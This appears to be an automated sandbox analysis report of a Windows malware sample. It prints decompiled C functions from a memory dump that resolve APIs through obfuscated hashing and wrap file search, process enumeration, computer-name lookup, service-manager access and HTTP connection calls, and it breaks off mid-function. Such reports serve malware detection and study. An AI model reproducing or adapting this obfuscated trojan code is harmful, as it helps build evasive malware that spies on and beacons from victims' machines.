CryptDecodeObjectEx.CRYPT32(00001A16,3FEE891D,00000000,FFFF309F,FEFFE01A,00000000,?,01C46047), ref: 0023765C

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CryptDecodeObject
String ID:
API String ID: 1207547050-0
Opcode ID: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
Instruction ID: bb02deba0445db0fbcc43e078e9a3058f5d4fde0ac38306c77f6071f689f5e3b
Opcode Fuzzy Hash: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
Instruction Fuzzy Hash: 2921087291060CFFDF05CF94DC46DDE7F76EB08314F148148FA1866160D7B29A61AB90

Uniqueness

Uniqueness Score: -1.00%

Function 0023109C, Relevance: 1.5, APIs: 1, Instructions: 46
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0023109C(void* __ecx, WCHAR* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				void* _t38;
				signed int _t40;
				WCHAR* _t46;

				_push(_a16);
				_t46 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0023602B(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0xf19a8;
				_v20 = 0x58c643;
				_v12 = 0xbcc6;
				_v12 = _v12 | 0xbb59ffff;
				_v12 = _v12 ^ 0xbb59839d;
				_v8 = 0x5dbd;
				_v8 = _v8 << 0xd;
				_t40 = 0x3f;
				_v8 = _v8 / _t40;
				_v8 = _v8 * 0x1f;
				_v8 = _v8 ^ 0x05c44d1b;
				E002407A9(0xce5de7ff, 0x9164b7cc, _t40, _t40, 0x264);
				_t38 = FindFirstFileW(_t46, _a4); // executed
				return _t38;
			}

0x002310a3
0x002310a6
0x002310a8
0x002310ab
0x002310ae
0x002310b1
0x002310b3
0x002310b8
0x002310bf
0x002310c8
0x002310cf
0x002310d6
0x002310dd
0x002310e4
0x002310eb
0x002310f4
0x002310fc
0x0023110f
0x00231112
0x0023111f
0x0023112b
0x00231131

APIs

FindFirstFileW.KERNEL32(?,BB59839D), ref: 0023112B

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
Instruction ID: 3d2a18e7d5a1731fbce18ee327e0c20934ebcdf88ef57999fcd5b578f0a80521
Opcode Fuzzy Hash: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
Instruction Fuzzy Hash: 621157B5D01208FBDF08EFA8D94A9DEBFB5EF44314F208098E9086B251D7B14B249F91

Uniqueness

Uniqueness Score: -1.00%

Function 00231C88, Relevance: 1.5, APIs: 1, Instructions: 38
processCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00231C88(int _a12) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t28;
				signed int _t29;

				_v28 = 0x4309a9;
				asm("stosd");
				_t29 = 0x31;
				asm("stosd");
				asm("stosd");
				_v12 = 0x7af7;
				_v12 = _v12 + 0x2003;
				_v12 = _v12 ^ 0x000083a5;
				_v8 = 0xa138;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t29;
				_v8 = _v8 ^ 0x00030e85;
				E002407A9(0xf2bcf6a3, 0x9164b7cc, _t29, _t29, 0x45);
				_t28 = CreateToolhelp32Snapshot(_a12, 0); // executed
				return _t28;
			}

0x00231c8f
0x00231c9d
0x00231ca0
0x00231ca3
0x00231ca6
0x00231ca7
0x00231cae
0x00231cb5
0x00231cbc
0x00231cc3
0x00231cd6
0x00231cd9
0x00231ce6
0x00231cf3
0x00231cf9

APIs

CreateToolhelp32Snapshot.KERNEL32(?,00000000), ref: 00231CF3

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
Instruction ID: a0f79cd37a911de6ad5112d10e61c345c37ff2a24b21dbd79c469b96adb0387a
Opcode Fuzzy Hash: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
Instruction Fuzzy Hash: B5F08171E00208BBFB04DFA8CD4668EFBB5EF84704F208099E50067291D7F55F148B81

Uniqueness

Uniqueness Score: -1.00%

Function 00235A52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
networkCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00235A52(WCHAR* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				unsigned int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t25;
				void* _t31;
				WCHAR* _t37;

				_t37 = __ecx;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				_push(__ecx);
				E0023602B(_t25);
				_v28 = 0x354aea;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v8 = 0x4733;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xffffa4b2;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x00006f5b;
				_v12 = 0x6e5;
				_v12 = _v12 ^ 0x21b9cf62;
				_v12 = _v12 ^ 0x21b9d5f6;
				E002407A9(0xfc7e7fb7, 0x1f801b8, __ecx, __ecx, 0x1ad);
				_t31 = InternetOpenW(_t37, _a24, 0, 0, 0); // executed
				return _t31;
			}

0x00235a5d
0x00235a5f
0x00235a60
0x00235a63
0x00235a66
0x00235a69
0x00235a6c
0x00235a6f
0x00235a70
0x00235a71
0x00235a72
0x00235a77
0x00235a86
0x00235a91
0x00235a99
0x00235a9a
0x00235aa1
0x00235aa5
0x00235aac
0x00235ab0
0x00235ab7
0x00235abe
0x00235ac5
0x00235ad2
0x00235ae1
0x00235ae9

APIs

InternetOpenW.WININET(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0CD25E5E), ref: 00235AE1

Strings

move one or more drives, or go back and choose a different location to save the backup on., xrefs: 00235A87
J5, xrefs: 00235A77

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: InternetOpen
String ID: move one or more drives, or go back and choose a different location to save the backup on.$J5
API String ID: 2038078732-2111703993
Opcode ID: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
Instruction ID: e6c971dc2c51495e47abe16891f3c162574880d4bfc3ce59acfa4a059ea88da5
Opcode Fuzzy Hash: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
Instruction Fuzzy Hash: 23113CB290060CBFEB05DF98DD869DFBB79EF14358F104098FA0562120D3B64E659BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00247955, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
networkCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00247955(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a36, void* _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t41;
				short _t47;

				_push(_a52);
				_t47 = __ecx;
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__ecx & 0x0000ffff);
				E0023602B(__ecx & 0x0000ffff);
				_v24 = 0x1f9770;
				_v20 = 0x380697;
				_v16 = 0;
				_v12 = 0x6440;
				_v12 = _v12 * 0xf;
				_v12 = _v12 * 0x65;
				_v12 = _v12 ^ 0x02513e1b;
				_v8 = 0x9d26;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x42bae3e2;
				_v8 = _v8 + 0x19dc;
				_v8 = _v8 ^ 0x40ce99cc;
				E002407A9(0x73a58955, 0x1f801b8, __ecx, __ecx, 0x1fa);
				_t41 = InternetConnectW(_a44, _a36, _t47, 0, 0, _a32, 0, 0); // executed
				return _t41;
			}

0x0024795d
0x00247962
0x00247964
0x00247965
0x0024796b
0x0024796c
0x0024796f
0x00247972
0x00247975
0x00247978
0x00247979
0x0024797c
0x0024797f
0x00247980
0x00247984
0x00247985
0x0024798a
0x00247994
0x002479a0
0x002479a3
0x002479ba
0x002479c1
0x002479c4
0x002479cb
0x002479d2
0x002479d6
0x002479dd
0x002479e4
0x002479f1
0x00247a07
0x00247a0e

APIs

InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 00247A07

Strings

move one or more drives, or go back and choose a different location to save the backup on., xrefs: 0024799B

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ConnectInternet
String ID: move one or more drives, or go back and choose a different location to save the backup on.
API String ID: 3050416762-1830404547
Opcode ID: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
Instruction ID: 8134902c561c6f3ab7f87bf362e512577a99c1d190715c40580341bc762d0a29
Opcode Fuzzy Hash: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
Instruction Fuzzy Hash: AA212472800248BBCF119F92CD49CDFBFB9FF89718F108199F90566120D7719A60DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00232959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00232959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0023602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002407A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002329DC

Strings

<^, xrefs: 00232977

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
Instruction ID: 4bda07148f96ae91c4ea11f07c8683422217309d709d9b2cf065ab4d5bd33d78
Opcode Fuzzy Hash: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
Instruction Fuzzy Hash: 5E015B72A00108BBEB18DF95DC4A8DFBFB6EF44310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0023C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0023C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0023602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002407A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x0023c6e1
0x0023c6e6
0x0023c6f0
0x0023c6fc
0x0023c703
0x0023c706
0x0023c70d
0x0023c711
0x0023c715
0x0023c71c
0x0023c723
0x0023c72a
0x0023c731
0x0023c738
0x0023c751
0x0023c762
0x0023c768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0023C762

Strings

/O, xrefs: 0023C6E6

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
Instruction ID: 8d8e337f00c3192cdd29c10cc9b4f922268430cbab26b068a59f539cbbc88e3d
Opcode Fuzzy Hash: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
Instruction Fuzzy Hash: 9C1133B290122DBBCB25DF95DC4A8EFBFB8EF04714F108188F90962210D3714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00248422, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00248422(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, void* _a12, long _a16, intOrPtr _a24, void* _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t33;
				int _t40;

				_push(_a28);
				_push(_a24);
				_push(0xffffffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t33);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x2f14d8;
				_v24 = 0x27cc4d;
				_v8 = 0xcfda;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x1b;
				_v8 = _v8 ^ 0xd01d7588;
				_v8 = _v8 ^ 0xdae8f2b7;
				_v12 = 0x64c6;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x001c0252;
				E002407A9(0x234ee083, 0x1f801b8, __ecx, __ecx, 0x11c);
				_t40 = HttpSendRequestW(_a12, _a8, 0xffffffff, _a28, _a16); // executed
				return _t40;
			}

0x00248428
0x0024842b
0x0024842e
0x00248430
0x00248433
0x00248436
0x00248439
0x0024843d
0x0024843e
0x00248443
0x0024844a
0x00248453
0x0024845a
0x00248461
0x00248468
0x0024847c
0x0024847f
0x00248486
0x0024848d
0x00248498
0x0024849b
0x002484a8
0x002484be
0x002484c3

APIs

HttpSendRequestW.WININET(00000000,00000000,000000FF,?,0027CC4D), ref: 002484BE

Strings

move one or more drives, or go back and choose a different location to save the backup on., xrefs: 0024844E

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: HttpRequestSend
String ID: move one or more drives, or go back and choose a different location to save the backup on.
API String ID: 360639707-1830404547
Opcode ID: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
Instruction ID: 95a13e3d4ef9656602f217454ae6f06fbb42262508d78e20569f6a2ec9e3a1bd
Opcode Fuzzy Hash: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
Instruction Fuzzy Hash: 351116B181120DFFCF05DF94CD469AEBFB6BB44314F208288F924662A1C3768B249B81

Uniqueness

Uniqueness Score: -1.00%

Function 0023F74E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0023F74E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t28;
				intOrPtr* _t35;
				void* _t36;
				signed int _t38;
				void* _t44;
				void* _t45;

				_t45 = __edx;
				E0023602B(_t28);
				_v8 = 0x515c;
				_v8 = _v8 + 0xc7b4;
				_t38 = 0xc;
				_v8 = _v8 / _t38;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000000a5;
				_v12 = 0xe7ac;
				_v12 = _v12 * 3;
				_v12 = _v12 ^ 0xe245e609;
				_v12 = _v12 ^ 0xe24720e8;
				_t35 = E002407A9(0xea0af15d, 0x7a94c48d, _t38, _t38, 0x20);
				_t36 =  *_t35(0, _t45, _a4, 0, __edx, _a4, _a8, _a12, _a16, _t44, __ecx, __ecx); // executed
				return _t36;
			}

0x0023f757
0x0023f765
0x0023f76a
0x0023f774
0x0023f782
0x0023f787
0x0023f78f
0x0023f793
0x0023f79a
0x0023f7ac
0x0023f7af
0x0023f7b6
0x0023f7c3
0x0023f7d1
0x0023f7d7

APIs

ObtainUserAgentString.URLMON(00000000,00000000,E24720E8), ref: 0023F7D1

Strings

G, xrefs: 0023F7B6

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AgentObtainStringUser
String ID: G
API String ID: 2681117516-4236931613
Opcode ID: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
Instruction ID: 4b9a95b568cec5df716d9f79b6e0719345b1106bd73cd135a924af9923a11cb0
Opcode Fuzzy Hash: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
Instruction Fuzzy Hash: 3B015771910208FBEB08DF94DD4AA9EBFB5EF84310F208088F50866290E6B15B60DB91

Uniqueness

Uniqueness Score: -1.00%

Function 002376F7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E002376F7(struct tagPROCESSENTRY32W* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t28;
				void* _t35;
				signed int _t37;
				struct tagPROCESSENTRY32W* _t43;

				_push(_a8);
				_t43 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t28);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x5756b4;
				_v20 = 0x17430f;
				_v12 = 0x6271;
				_t37 = 0x43;
				_v12 = _v12 / _t37;
				_v12 = _v12 ^ 0x00004051;
				_v8 = 0x9292;
				_v8 = _v8 + 0x9a70;
				_v8 = _v8 << 0xb;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0x3dcb9719;
				_t35 = E002407A9(0x5538536e, 0x9164b7cc, _t37, _t37, 0x1b8);
				Process32FirstW(_a8, _t43); // executed
				return _t35;
			}

0x002376fe
0x00237701
0x00237703
0x00237706
0x00237707
0x00237708
0x0023770d
0x00237714
0x0023771d
0x00237724
0x00237730
0x00237738
0x00237740
0x00237747
0x0023774e
0x00237755
0x00237764
0x00237767
0x00237774
0x00237780
0x00237786

APIs

Process32FirstW.KERNEL32(00000000,?,?,?,?,?,?,?,00000BF7), ref: 00237780

Strings

nS8U, xrefs: 0023775F

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FirstProcess32
String ID: nS8U
API String ID: 2623510744-2564412997
Opcode ID: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
Instruction ID: 0155655160a134d778fcc5fbe59f39a542d7efa231e9378b3c8b4bf535102486
Opcode Fuzzy Hash: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
Instruction Fuzzy Hash: EB0125B5D01218FBEB04DFA4D90A9EEBFB5EF40314F208099E8186B251E7B55B249F91

Uniqueness

Uniqueness Score: -1.00%

Function 00231000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00231000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0023602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002407A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00231096

Strings

[, xrefs: 0023103B

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
Instruction ID: e58eb9bd9a0dd2f4184544d5c7de3129890655c1ea17d86febe5a0eb92b555e5
Opcode Fuzzy Hash: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
Instruction Fuzzy Hash: AE015BB6D01308BBDF04DF94C94A5DEBBB1AB54318F108188E51466291D3B19B649F91

Uniqueness

Uniqueness Score: -1.00%

Function 0023602C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0023602C(void* __ecx, CHAR* __edx, DWORD* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t23;
				int _t29;
				CHAR* _t34;

				_push(_a8);
				_t34 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t23);
				_v16 = _v16 & 0x00000000;
				_v28 = 0x56a9ae;
				_v24 = 0x46a5f8;
				_v20 = 0x71462f;
				_v8 = 0x2cb4;
				_v8 = _v8 + 0xdc6b;
				_v8 = _v8 * 0x25;
				_v8 = _v8 ^ 0x0026370c;
				_v12 = 0x2021;
				_v12 = _v12 ^ 0x8c534c3d;
				_v12 = _v12 ^ 0x8c530eb3;
				E002407A9(0xbd983dde, 0x9164b7cc, __ecx, __ecx, 0x16f);
				_t29 = GetComputerNameA(_t34, _a4); // executed
				return _t29;
			}

0x00236033
0x00236036
0x00236038
0x0023603b
0x0023603c
0x0023603d
0x00236042
0x00236049
0x00236055
0x0023605c
0x00236063
0x0023606a
0x00236081
0x00236084
0x0023608b
0x00236092
0x00236099
0x002360a6
0x002360b2
0x002360b8

APIs

GetComputerNameA.KERNEL32(?,8C530EB3,?,?,?,?,?,?,0000007A), ref: 002360B2

Strings

/Fq, xrefs: 0023605C

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ComputerName
String ID: /Fq
API String ID: 3545744682-1299280358
Opcode ID: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
Instruction ID: 4e68f123abff462948f7ef0e0cb870ee6e38776c553b21730c41fe5c0ce5c6a7
Opcode Fuzzy Hash: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
Instruction Fuzzy Hash: 3D011AB5C1120CBBDB08EFE4D94A9EEBFB4EF41314F108189E8086B251D3B54B649F92

Uniqueness

Uniqueness Score: -1.00%

Function 0023595A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0023595A(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				void* _t22;
				int _t27;
				void* _t33;

				_push(__ecx);
				_push(__ecx);
				_push(_a8);
				_t33 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t22);
				_v8 = 0xecfb;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x8346;
				_v8 = _v8 + 0xffffe2f9;
				_v8 = _v8 ^ 0x000008ac;
				_v12 = 0x34e0;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x1d0c124c;
				_v12 = _v12 ^ 0x1d0c2b7f;
				E002407A9(0xe8880df4, 0x9164b7cc, __ecx, __ecx, 0x196);
				_t27 = FindNextFileW(_t33, _a4); // executed
				return _t27;
			}

0x0023595d
0x0023595e
0x00235960
0x00235963
0x00235965
0x00235968
0x00235969
0x0023596a
0x0023596f
0x00235979
0x00235982
0x00235989
0x00235990
0x00235997
0x0023599e
0x002359a2
0x002359a9
0x002359c2
0x002359ce
0x002359d4

APIs

FindNextFileW.KERNEL32(?,1D0C2B7F), ref: 002359CE

Strings

4, xrefs: 00235997

Memory Dump Source

Source File: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 0000000B.00000002.2347121945.0000000000230000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2347153434.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileFindNext
String ID: 4
API String ID: 2029273394-293933855
Opcode ID: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
Instruction ID: 4cecd449feaead3826affd18734d07818c2cd8451c23af56977727fae507e25e
Opcode Fuzzy Hash: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
Instruction Fuzzy Hash: 05014B76D11208BBEB18DFA4C84A8DEBE78EF40354F108188E80867251D7B25F649B92

Uniqueness

Uniqueness Score: -1.00%

Function 00244F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00244F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
